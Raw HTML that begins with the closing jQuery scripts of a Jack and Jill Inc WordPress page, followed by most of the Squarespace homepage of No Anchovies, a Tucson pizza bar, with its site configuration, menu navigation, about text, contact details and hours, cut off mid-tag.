src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery.fancybox.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/custom.js"></script> <script type="text/javascript"> var acc = document.getElementsByClassName("accordion"); var i; for (i = 0; i < acc.length; i++) { acc[i].onclick = function() { var active = document.querySelector(".accordion.active"); if (active && active != this) { active.classList.remove("active"); active.nextElementSibling.classList.remove("show"); } this.classList.toggle("active"); this.nextElementSibling.classList.toggle("show"); } } </script> <!-- ngg_resource_manager_marker --><script type='text/javascript' src='https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/functions.js?ver=20150315'></script> <script type="text/javascript"> jQuery(function($) { function equalHeight(group) { tallest = 0; group.each(function() { thisHeight = $(this).height(); if(thisHeight > tallest) { tallest = thisHeight; } }); group.height(tallest); } equalHeight($(".dg-grid-shortcode .dg_grid-shortcode-col")); $(window).resize(function() { equalHeight($(".dg-grid-shortcode .dg_grid-shortcode-col")); }); }); </script> </body> </html>
0
<!doctype html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:website="http://ogp.me/ns/website" lang="en-US" itemscope itemtype="http://schema.org/WebPage" class="touch-styles"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- This is Squarespace. --><!-- vanilla-ladybug-m8da --> <base href=""> <meta charset="utf-8" /> <title>No Anchovies</title> <link rel="shortcut icon" type="image/x-icon" href="https://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c491141aa4a992e800bab9f/favicon.ico"/> <link rel="canonical" href="https://www.noanchoviesaz.com/"/> <meta property="og:site_name" content="No Anchovies"/> <meta property="og:title" content="No Anchovies"/> <meta property="og:url" content="https://www.noanchoviesaz.com/"/> <meta property="og:type" content="website"/> <meta property="og:description" content="ALSO KNOWN AS “CHOVIES” OR “NO CHOVES” WE ARE A UOF A HOT SPOT LOCATED IN THE HEART OF UNIVERSITY BLVD DISHING UP PIZZA, APPETIZERS AND DRINKS SINCE 1997."/> <meta property="og:image" content="http://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1548189308565/NoAnchovies-logo-4.png?format=1500w"/> <meta property="og:image:width" content="350"/> <meta property="og:image:height" content="263"/> <meta itemprop="name" content="No Anchovies"/> <meta itemprop="url" content="https://www.noanchoviesaz.com/"/> <meta itemprop="description" content="ALSO KNOWN AS “CHOVIES” OR “NO CHOVES” WE ARE A UOF A HOT SPOT LOCATED IN THE HEART OF UNIVERSITY BLVD DISHING UP PIZZA, APPETIZERS AND DRINKS SINCE 1997."/> <meta itemprop="thumbnailUrl" content="http://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1548189308565/NoAnchovies-logo-4.png?format=1500w"/> <link rel="image_src" href="http://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1548189308565/NoAnchovies-logo-4.png?format=1500w" /> <meta itemprop="image" content="http://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1548189308565/NoAnchovies-logo-4.png?format=1500w"/> <meta name="twitter:title" content="No Anchovies"/> <meta name="twitter:image" content="http://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1548189308565/NoAnchovies-logo-4.png?format=1500w"/> <meta name="twitter:url" content="https://www.noanchoviesaz.com/"/> <meta name="twitter:card" content="summary"/> <meta name="twitter:description" content="ALSO KNOWN AS “CHOVIES” OR “NO CHOVES” WE ARE A UOF A HOT SPOT LOCATED IN THE HEART OF UNIVERSITY BLVD DISHING UP PIZZA, APPETIZERS AND DRINKS SINCE 1997."/> <meta name="description" content="ALSO KNOWN AS “CHOVIES” OR “NO CHOVES” WE ARE A UOF A HOT SPOT LOCATED IN THE HEART OF UNIVERSITY BLVD DISHING UP PIZZA, APPETIZERS AND DRINKS SINCE 1997." /> <link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Raleway:600,700,100,400,700i,400i,500,800i,800,600i,300i,300,200"/> <script type="text/javascript">SQUARESPACE_ROLLUPS = {};</script> <script>(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//static.squarespace.com/universal/scripts-compressed/common-107b7113479fd64a9c74-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');</script> <script crossorigin="anonymous" src="//static.squarespace.com/universal/scripts-compressed/common-107b7113479fd64a9c74-min.en-US.js" ></script><script crossorigin="anonymous" src="//static.squarespace.com/universal/scripts-compressed/performance-6b3f9eaf6d4cbc71cdc8-min.en-US.js" defer ></script><script data-name="static-context">Static = window.Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","rollups":{"squarespace-announcement-bar":{"css":"//static.squarespace.com/universal/styles-compressed/announcement-bar-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/announcement-bar-1da068089eeaf6433934-min.en-US.js"},"squarespace-audio-player":{"css":"//static.squarespace.com/universal/styles-compressed/audio-player-a57b8f3aa31918104f57a068648fbc63-min.css","js":"//static.squarespace.com/universal/scripts-compressed/audio-player-c647ea3b3c9d84dc1ad6-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//static.squarespace.com/universal/styles-compressed/blog-collection-list-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/blog-collection-list-dae61b6efffd234d480e-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//static.squarespace.com/universal/styles-compressed/calendar-block-renderer-9acef2d24c6a994fca1a8a82e99e19c3-min.css","js":"//static.squarespace.com/universal/scripts-compressed/calendar-block-renderer-3fac0a2a32676d10e398-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//static.squarespace.com/universal/styles-compressed/chartjs-helpers-9935a41d63cf08ca108505d288c1712e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/chartjs-helpers-3c22db23fb4c0ce1d0ff-min.en-US.js"},"squarespace-comments":{"css":"//static.squarespace.com/universal/styles-compressed/comments-a7b26c9ae88684f76d210b61d0b0d848-min.css","js":"//static.squarespace.com/universal/scripts-compressed/comments-b63c5a0def91b45e2af4-min.en-US.js"},"squarespace-commerce-cart":{"js":"//static.squarespace.com/universal/scripts-compressed/commerce-cart-70fcf9b5999b750c9f31-min.en-US.js"},"squarespace-dialog":{"css":"//static.squarespace.com/universal/styles-compressed/dialog-7d0827ef14cce0b773fcd1eee28fbdee-min.css","js":"//static.squarespace.com/universal/scripts-compressed/dialog-7dea686aed59989c6fc7-min.en-US.js"},"squarespace-events-collection":{"css":"//static.squarespace.com/universal/styles-compressed/events-collection-9acef2d24c6a994fca1a8a82e99e19c3-min.css","js":"//static.squarespace.com/universal/scripts-compressed/events-collection-8579e0a8f98969df6cf7-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//static.squarespace.com/universal/scripts-compressed/form-rendering-utils-876cdd438ec51a9337e5-min.en-US.js"},"squarespace-forms":{"css":"//static.squarespace.com/universal/styles-compressed/forms-ac7917c174031c937e3df4b3a2005b34-min.css","js":"//static.squarespace.com/universal/scripts-compressed/forms-417c0a5228f6965367ce-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//static.squarespace.com/universal/styles-compressed/gallery-collection-list-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/gallery-collection-list-7648566bab72920ef13d-min.en-US.js"},"squarespace-image-zoom":{"css":"//static.squarespace.com/universal/styles-compressed/image-zoom-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/image-zoom-10a26b85dd3967911f68-min.en-US.js"},"squarespace-pinterest":{"css":"//static.squarespace.com/universal/styles-compressed/pinterest-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/pinterest-dced14fb35881e9638d2-min.en-US.js"},"squarespace-popup-overlay":{"css":"//static.squarespace.com/universal/styles-compressed/popup-overlay-7b48efeab9b323dfdb524a256cf61595-min.css","js":"//static.squarespace.com/universal/scripts-compressed/popup-overlay-1d188496920efeba52fb-min.en-US.js"},"squarespace-product-quick-view":{"css":"//static.squarespace.com/universal/styles-compressed/product-quick-view-bc8694b75a40e4bd969b662b80ebafb5-min.css","js":"//static.squarespace.com/universal/scripts-compressed/product-quick-view-315dfe834a730708cc4c-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//static.squarespace.com/universal/styles-compressed/products-collection-item-v2-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/products-collection-item-v2-710e7bfc2d9396294824-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//static.squarespace.com/universal/styles-compressed/products-collection-list-v2-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/products-collection-list-v2-6d9a105155618ddbb04b-min.en-US.js"},"squarespace-search-page":{"css":"//static.squarespace.com/universal/styles-compressed/search-page-ea3e98edb84abbc5e758884f69149027-min.css","js":"//static.squarespace.com/universal/scripts-compressed/search-page-cd3faa7269d59ec8c326-min.en-US.js"},"squarespace-search-preview":{"js":"//static.squarespace.com/universal/scripts-compressed/search-preview-a6817cbe59ea35029fb2-min.en-US.js"},"squarespace-share-buttons":{"js":"//static.squarespace.com/universal/scripts-compressed/share-buttons-d32aa529f3e1ac692f58-min.en-US.js"},"squarespace-simple-liking":{"css":"//static.squarespace.com/universal/styles-compressed/simple-liking-310d0b18e112f708f91339b11fd55714-min.css","js":"//static.squarespace.com/universal/scripts-compressed/simple-liking-4c51a395c94f1ab1ea45-min.en-US.js"},"squarespace-social-buttons":{"css":"//static.squarespace.com/universal/styles-compressed/social-buttons-26106f808f7e9c739a7f862a408ed039-min.css","js":"//static.squarespace.com/universal/scripts-compressed/social-buttons-88125918b982c2d2bce3-min.en-US.js"},"squarespace-tourdates":{"css":"//static.squarespace.com/universal/styles-compressed/tourdates-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/tourdates-75372f0aa921d11c87a5-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//static.squarespace.com/universal/styles-compressed/website-overlays-manager-df9cddfe3eca22764d10fd6fc4f4ad73-min.css","js":"//static.squarespace.com/universal/scripts-compressed/website-overlays-manager-6473ec2d040da15ca868-min.en-US.js"}},"pageType":1,"website":{"id":"5c477aa8f793922c09e88677","identifier":"vanilla-ladybug-m8da","websiteType":1,"contentModifiedOn":1557969994037,"cloneable":false,"siteStatus":{},"language":"en-US","timeZone":"America/Phoenix","machineTimeZoneOffset":-25200000,"timeZoneOffset":-25200000,"timeZoneAbbr":"MST","siteTitle":"No Anchovies","fullSiteTitle":"No Anchovies","siteTagLine":"PIZZA | BAR | NIGHTLIFE","siteDescription":"","location":{"mapLat":32.231407,"mapLng":-110.95844069999998,"addressTitle":"No Anchovies","addressLine1":"870 East University Boulevard","addressLine2":"Tucson, AZ, 85719","addressCountry":"United States"},"logoImageId":"5c477bf942bfc145251b50fc","socialLogoImageId":"5c477e794ae23759d4d368db","shareButtonOptions":{"5":true,"4":true,"3":true,"2":true,"7":true,"1":true,"8":true,"6":true},"logoImageUrl":"//static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477bf942bfc145251b50fc/1557969994037/","socialLogoImageUrl":"//static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477e794ae23759d4d368db/1557969994037/","authenticUrl":"https://www.noanchoviesaz.com","internalUrl":"https://vanilla-ladybug-m8da.squarespace.com","baseUrl":"https://www.noanchoviesaz.com","primaryDomain":"www.noanchoviesaz.com","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":10,"userId":"524178424","userName":"noanchoviesaz","screenname":"No Anchovies","addedOn":1548362695140,"profileUrl":"http://instagram.com/noanchoviesaz","iconUrl":"https://scontent.cdninstagram.com/vp/d90435763d1f785df2d90e45b28da618/5CE5B848/t51.2885-19/s150x150/49546680_233397887596229_6719294404072308736_n.jpg?_nc_ht=scontent.cdninstagram.com","collectionId":"5c4a23c7b10598270fb191eb","iconEnabled":true,"serviceName":"instagram"},{"serviceId":2,"userId":"1631421006902484","screenname":"Jordan Vogel","addedOn":1549585658758,"profileUrl":"https://www.facebook.com/noanchoviesaz/","iconUrl":"http://graph.facebook.com/1631421006902484/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"screenshotId":"74dfb66cef85e5ea2fd45da0f1c0ee066359ee79ae68e85373eedbe8f6de8ac3","showOwnerLogin":false},"websiteSettings":{"id":"5c477aa8f793922c09e88679","websiteId":"5c477aa8f793922c09e88677","subjects":[],"country":"US","state":"AZ","simpleLikingEnabled":true,"mobileInfoBarSettings":{"style":2,"isContactEmailEnabled":true,"isContactPhoneNumberEnabled":true,"isLocationEnabled":true,"isBusinessHoursEnabled":true},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"contactPhoneNumber":"(520) 623-3333","businessHours":{"monday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"tuesday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"wednesday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"thursday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"friday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"saturday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]},"sunday":{"text":"11am - 2am","ranges":[{"from":660,"to":120}]}},"contactEmail":"[email protected]","storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"paymentSettings":{},"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"enableMailingListOptInByDefault":false,"contactLocation":{"addressLine1":"870 East University Boulevard","addressLine2":"Tucson, AZ, 85719","addressCountry":"United States"},"businessName":"No Anchovies","sameAsRetailLocation":false,"businessId":"","merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":""},"websiteCloneable":false,"collection":{"title":"Welcome","id":"5c49100903ce64a987066c66","fullUrl":"/","type":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","design":"Slideshow","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-controls":"Both","gallery-design":"Grid","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","grid-aspect-ratio":"1:1 (Square)","gridSize":"350px","gridSpacing":"20px","headerPadding":"30px","homepage-index-nav":"Show On Scroll","logoWidth":"200px","product-gallery-auto-crop":"false","product-image-auto-crop":"true","siteTitleContainerWidth":"255px","slideshow-aspect-ratio":"16:9 (Widescreen)","slideshow-autoplay":"true","slideshow-transition":"Fade"},"templateId":"52e96934e4b0ea14d0f64568","pageFeatures":[1,2,4],"googleMapsStaticApiKey":"AIzaSyBQdch5IcgcQaKNG76sbMQv1MEBEKLeQ-8","betaFeatureFlags":["ORDERS-SERVICE-check-digital-good-access-with-service","ORDERS-SERVICE-reset-digital-goods-access-with-service","dg_downloads_from_fastly","product-retriever-v2-enabled","domain_locking_via_registrar_service","image_editor_experimental_features","domain_deletion_via_registrar_service","domain_info_via_registrar_service","domain_renewal_via_registrar_service","add_new_page_alt","image_picker","collection_orchestrator_endpoints"],"impersonatedSession":false,"demoCollections":[{"collectionId":"539f2df6e4b0365dad751b5e","deleted":true},{"collectionId":"535813a6e4b0c3ad7382ee7a","deleted":true},{"collectionId":"535817d6e4b0950857ff2550","deleted":true},{"collectionId":"535827a9e4b04e172ce35ea9","deleted":true},{"collectionId":"53593b44e4b05b142a061dc8","deleted":true},{"collectionId":"53343fb0e4b033999bd7af62","deleted":true},{"collectionId":"53974b97e4b04c5c0976f862","deleted":true},{"collectionId":"535814f2e4b09312a902d906","deleted":true}],"tzData":{"zones":[[-420,null,"MST",null]],"rules":{}}};</script><script type="text/javascript"> SquarespaceFonts.loadViaContext(); Squarespace.load(window);</script><link rel="alternate" type="application/rss+xml" title="RSS Feed" href="https://www.noanchoviesaz.com/welcome?format=RSS" /> <script type="application/ld+json">{"url":"https://www.noanchoviesaz.com","name":"No Anchovies","description":"","image":"//static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477bf942bfc145251b50fc/1557969994037/","@context":"http://schema.org","@type":"WebSite"}</script><script type="application/ld+json">{"legalName":"No Anchovies","address":"870 East University Boulevard\nTucson, AZ, 85719\nUnited States","email":"[email protected]","telephone":"(520) 623-3333","sameAs":["http://instagram.com/noanchoviesaz","https://www.facebook.com/noanchoviesaz/"],"@context":"http://schema.org","@type":"Organization"}</script><script type="application/ld+json">{"address":"870 East University Boulevard\nTucson, AZ, 85719\nUnited States","image":"https://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477bf942bfc145251b50fc/1557969994037/","name":"No Anchovies","openingHours":"Mo 11:00-02:00, Tu 11:00-02:00, We 11:00-02:00, Th 11:00-02:00, Fr 11:00-02:00, Sa 11:00-02:00, Su 11:00-02:00","@context":"http://schema.org","@type":"LocalBusiness"}</script><!--[if gte IE 9]> <link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&part=1"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&part=2"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&part=3"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&part=4"/><![endif]--> <!--[if lt IE 9]><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&noMedia=true&part=1"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&noMedia=true&part=2"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&noMedia=true&part=3"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false&noMedia=true&part=4"/><![endif]--> <!--[if !IE]> --><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c477aa8f793922c09e88677/7/52e96934e4b0ea14d0f64568/5c477aa8f793922c09e8868b/1118-05142015/1557969994027/site.css?&filterFeatures=false"/><!-- <![endif]--> <script>Static.COOKIE_BANNER_CAPABLE = true;</script> <!-- End of Squarespace Headers --> <script>/* Must be below squarespace-headers */(function(){var touchTest="ontouchstart"in window||navigator.msMaxTouchPoints;if(!touchTest){with(document.documentElement){className=className.replace(new RegExp("touch-styles"),"")}}})()</script> </head> <body id="collection-5c49100903ce64a987066c66" class="transparent-header expand-homepage-index-links homepage-index-nav-show-on-scroll show-page-title index-section-separation-alternating-background design-slideshow grid-aspect-ratio-11-square grid-max-columns-four slideshow-aspect-ratio-169-widescreen slideshow-transition-fade slideshow-autoplay gallery-controls-both gallery-controls-color-light meta-priority-date hide-entry-author pre-footer-content-custom show-category-navigation event-show-past-events event-thumbnails event-thumbnail-size-32-standard event-date-label event-list-show-cats event-list-date event-list-time event-list-address event-icalgcal-links event-excerpts event-item-back-link gallery-design-grid aspect-ratio-auto lightbox-style-dark gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop product-list-titles-under product-list-alignment-center product-item-size-11-square product-image-auto-crop product-gallery-size-11-square show-product-price show-product-item-nav product-social-sharing newsletter-style-dark hide-opentable-icons opentable-style-dark small-button-style-solid small-button-shape-pill medium-button-style-solid medium-button-shape-rounded large-button-style-solid large-button-shape-rounded image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-solid button-corner-style-pill tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-5c49100903ce64a987066c66 collection-type-index collection-layout-default homepage view-list mobile-style-available logo-image has-banner-image index-page collection-welcome"> <div id="site"> <input type="checkbox" name="mobile-nav-toggle" id="mobileNavToggle" class="mobile-nav-toggle-box hidden" /> <div id="overlayNav"> <div id="mobileNavWrapper" class="nav-wrapper"> <nav id="mobileNavigation"> <div class="index home"> <a href="/#home-section"> Home </a> </div> <div class="index home"> <a href="/#about-section"> About </a> </div> <div class="index home"> <a href="/#menu-section"> Menu </a> </div> <div class="index home"> <a href="/#events-catering-section"> Events & Catering </a> </div> <div class="index home"> <a href="/#vip-tables-section"> VIP Tables </a> </div> <div class="index home"> <a href="/#contact-section"> Contact </a> </div> <div class="index base"> <a href="/"> Welcome </a> </div> </nav> </div> </div> <header id="header" role="banner"> <div class="header-inner"> <div id="logoWrapper" class="title-logo-wrapper" data-content-field="site-title"> <h1 id="logoImage" class="tmpl-loading logo-image"><a href="/"><img src="//static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5c477bf942bfc145251b50fc/1557969994037/?format=1500w" alt="No Anchovies" /></a></h1> </div><!-- comment the linebreak between these two elements because science --><label for="mobileNavToggle" class="mobile-nav-toggle-label show-on-scroll-mobile"><div class="top-bar"></div><div class="middle-bar"></div><div class="bottom-bar"></div></label><!-- comment the linebreak between these two elements because science --><div id="headerNav" class="tmpl-loading" > <div id="mainNavWrapper" class="nav-wrapper desktop-nav-wrapper show-on-scroll"> <nav id="mainNavigation" data-content-field="navigation" > <div class="index home"> <a href="/#home-section"> Home </a> </div> <div class="index home"> <a href="/#about-section"> About </a> </div> <div class="index home"> <a href="/#menu-section"> Menu </a> </div> <div class="index home"> <a href="/#events-catering-section"> Events & Catering </a> </div> <div class="index home"> <a href="/#vip-tables-section"> VIP Tables </a> </div> <div class="index home"> <a href="/#contact-section"> Contact </a> </div> <div class="index base active"> <a href="/"> Welcome </a> </div> </nav> </div> <!-- style below blocks out the mobile nav toggle only when nav is loaded --> <style>.mobile-nav-toggle-label { display: inline-block; }</style> </div> </div> </header> <div id="siteWrapper" class="clearfix"> <!-- Banner --> <!-- nothing to see here, move along --> <main id="page" role="main"> <div id="content" class="main-content" data-content-field="main-content" data-collection-id="5c49100903ce64a987066c66" > <!-- Create index sections --> <div id="home-section" class="index-section page" data-url-id="home" data-collection-id="5c4780344fa51a8e6eb1de21" data-edit-main-image="Background" > <div class="index-section-wrapper has-main-media has-main-image"> <!-- For Pages --> <div class="index-section-image content-fill"> <img data-src="https://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5cdcbc3de4966be175706254/1557969991053/dde98.jpg" data-image="https://static1.squarespace.com/static/5c477aa8f793922c09e88677/t/5cdcbc3de4966be175706254/1557969991053/dde98.jpg" data-image-dimensions="2500x1667" data-image-focal-point="0.5,0.5" alt="dde98.jpg" /> </div> <div class="index-image-overlay"></div> <div class="content page-content has-main-media has-main-image tmpl-loading" id="home-page" data-url-id="home"> <div class="content-inner has-content"> <div class="sqs-layout sqs-grid-12 columns-12" data-type="page" data-updated-on="1551812858599" id="page-5c4780344fa51a8e6eb1de21"><div class="row sqs-row"><div class="col sqs-col-12 span-12"><div class="sqs-block spacer-block sqs-block-spacer" data-aspect-ratio="13.880597014925373" data-block-type="21" id="block-yui_3_17_2_1_1413555146600_8643"><div class="sqs-block-content">&nbsp;</div></div><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-2ed8c5e026ef40bb6eb6"><div class="sqs-block-content"><h1 style="text-align:center;white-space:pre-wrap;">Pizza | Bar | Nightlife</h1></div></div><div class="sqs-block spacer-block sqs-block-spacer sized vsize-1" data-block-type="21" id="block-yui_3_17_2_1_1549570083633_20893"><div class="sqs-block-content">&nbsp;</div></div><div class="sqs-block button-block sqs-block-button" data-block-type="53" id="block-yui_3_17_2_1_1549661367269_9115"><div class="sqs-block-content"> <div class="sqs-block-button-container--center" data-alignment="center" data-button-size="large"> <a href="https://noanchoviesaz.hungerrush.com" class="sqs-block-button-element--large sqs-block-button-element" target="_blank">ORDER DELIVERY / PICK UP</a> </div></div></div></div></div></div> </div> </div> <!-- For Galleries --> <!-- For Albums --> </div> </div> <div id="about-section" class="index-section no-main-image page" data-url-id="about" data-collection-id="5c477f7970a6ad721e46359e" data-edit-main-image="Background" > <div class="index-section-wrapper"> <!-- For Pages --> <div class="content page-content" id="about-page" data-url-id="about"> <div class="content-inner has-content"> <div class="sqs-layout sqs-grid-12 columns-12" data-type="page" data-updated-on="1550079031129" id="page-5c477f7970a6ad721e46359e"><div class="row sqs-row"><div class="col sqs-col-8 span-8"><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-f51f808fa3878aff9137"><div class="sqs-block-content"><h1 style="white-space:pre-wrap;">ABOUT US</h1><h3 style="white-space:pre-wrap;">ALso known as “Chovies” or “No Choves” we are a uofa hot spot Located in the heart of UNIVERSITY BLVD dishing up pizza, appetizers and drinks since 1997.</h3><h3 style="white-space:pre-wrap;">After recent renovationS, we now offer OVER 10,000 sqft with bars on 2 floors, 65 big screens and SEATING FOR 300+. Our pizza line is bigger than eveR with 15+ Slices TO CHOOSE FROM, saucy WINGS, hot Sandwiches, Fresh Salads, cookies/brownies AND our Famous Loaded Tots. </h3><h3 style="white-space:pre-wrap;">DON’T MISS OUT ON OUR STATE OF THE ART DAY &amp; NIGHT CLUB EVENTS ON FRIDAYs AND SATURDAYs. boasting a 50,000 watt Martin Audio sound system along with cutting edge special effects, lights, lasers, and visuals. We serve as a laboratory for emerging artists to explore their sound, featuring some of the best local and touring acts.</h3><p style="white-space:pre-wrap;"><br></p></div></div></div><div class="col sqs-col-1 span-1"><div class="sqs-block spacer-block sqs-block-spacer sized vsize-1" data-block-type="21" id="block-yui_3_17_2_1_1413555146600_35250"><div class="sqs-block-content">&nbsp;</div></div></div><div class="col sqs-col-3 span-3"><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-yui_3_17_2_1_1413555146600_23182"><div class="sqs-block-content"><h3 style="white-space:pre-wrap;"><strong>CONTACT</strong></h3><p style="white-space:pre-wrap;">(520) 623-3333</p><p style="white-space:pre-wrap;">[email protected]</p><h3 style="white-space:pre-wrap;"><strong>Location</strong></h3><p style="white-space:pre-wrap;">870 E University Blvd<br>Tucson, AZ 85719</p><h3 style="white-space:pre-wrap;"><strong>food &amp; bar Hours</strong></h3><p 